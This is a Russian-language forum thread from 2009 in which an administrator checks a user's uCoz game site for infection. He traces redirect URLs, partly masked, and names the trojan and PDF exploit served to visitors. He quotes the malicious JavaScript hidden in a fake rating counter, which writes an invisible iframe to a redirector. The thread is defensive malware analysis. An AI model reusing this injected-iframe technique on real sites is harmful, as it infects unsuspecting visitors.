Решена Проверьте пожалуйста сайт ввв.the-games.net.ru

Тема в разделе "Анализ сайтов на наличие вирусов", создана пользователем Nazaro4eG, 21 ноя 2009.

Статус темы:
Закрыта.
  1. Nazaro4eG
    Оффлайн

    Nazaro4eG Активный пользователь

    Сообщения:
    3
    Симпатии:
    0
    Проверьте пожалуйста сайт ввв.the-games.net.ru или первый домен ввв.the-game.ucoz.ru
    На камп попадает вирус Backdoor.Win32.Bredavi и Exploit.Win32.Pidief, решил проверить сначала свой сайт.
    Если несложно просто посмотрите эти сайты:
    ввв.kentgames.ru
    ввв.justgamez.net
    ввв.allgamesone.ucoz.ru
    ввв.forucoz.com

    Если нет времени то их ненадо.
    Заранее спс
     
  2. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.455
    Симпатии:
    13.954
    the-game.ucoz.ru - заражен.
    Редирект

    Код (Text):
    http://**.lank.jino.ru/got.php?sid=2
    Который редиректит на
    Код (Text):
    http://****net.cn/index.php?
    При повторном заходе редиректит на

    Код (Text):
    http://s24.ucoz.ru/index/0-4
    Добавлено через 22 минуты 57 секунд
    Код (Text):
    http://collection-****.ru/img/Banners/banner5.png
    - что тут должно лежать?

    Добавлено через 1 минуту 46 секунд
    И это не нравится.
    Код (Text):
    http://counter.***-marketolog.ru/counter/?mode=b3-5
    Добавлено через 7 минут 43 секунды
    Но "хвост хранится" в
    PHP:
    <script src='http://ucoz-top.ru/***/?u=The-Games' language='javascript'></script>
    Если посмотреть код который возвращает эта ссылка
    PHP:
    document.write('<a href="http://ucoz-top.ru/" target="_blank"><img src="http://ucoz-top.ru/usite/The-Games/642e92efb79421734881b53e1e1b18b6/'+screen.width+'-'+screen.height+'/'+navigator.appCodeName+'-'+navigator.appVersion+'" alt="uCoz-Top.Ru - Топ рейтинг uCoz ресурсов." onMouseover="javascript:Info();" border="0" /><img src=http://data.alexa.com/data/7jiXhVpLR9byAc?cli=10&dat=snba&ver=7.2&cdt=alx_vw&wid=8033&act=00000000000&ss=1280x1024&bw=1523&t=0&ttl=645&vis=1&rq=80&url=http://ucoz-top.ru/ style="display:none;" /></a>');
    var stats = '<iframe style="display:none;" [B]src="http://**.***.jino.ru/go.php?sid=2[/B]"></iframe>';document.write(stats);var chk=document.getElementById('uzcrsite');if(chk){function c_go(){window.open('http://ucoz-top.ru/')}var t1=document.getElementsByTagName('A');var t2=document.getElementsByTagName('SCRIPT');t1[0].innerHTML=t1[0].innerHTML.replace('Создать сайт','uCoz-Top.Ru - ТОП рейтинг');t1[0].innerHTML=t1[0].innerHTML.replace('Create a Website','uCoz-Top.Ru - TOP list');document.getElementsByTagName('DIV')[4].onclick=function(){c_go()};}
    function Info(){_uWnd.alert("Рейтинг <b>uCoz</b> сайтов.<br>Регистрируйся!<br><a href='http://ucoz-top.ru/' target='_blank'>Подробнее...</a> ","uCoz-Top.Ru","{name:'utop',w:50,h:50,tm:15000,icon:'http://s102.ucoz.net/img/icon/tip.png'}");}
    То можно заметить редирект который я описал выше.

    офф
    Не скажу, что было легко.


    Пытаются забросить на компьютер пользователя:
    Trojan-Downloader.Java.Agent.ac
    Exploit.Win32.Pidief.cvy
     
    2 пользователям это понравилось.
  3. Nazaro4eG
    Оффлайн

    Nazaro4eG Активный пользователь

    Сообщения:
    3
    Симпатии:
    0
    akoK, спс огромное, загляни ещё плизз. я вродь убрал хЗ
     
  4. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.455
    Симпатии:
    13.954
    Сейчас ничего интересного не вижу.
     
    4 пользователям это понравилось.
  5. Nazaro4eG
    Оффлайн

    Nazaro4eG Активный пользователь

    Сообщения:
    3
    Симпатии:
    0
    akoK, спасибо огромное!
     
Статус темы:
Закрыта.

Поделиться этой страницей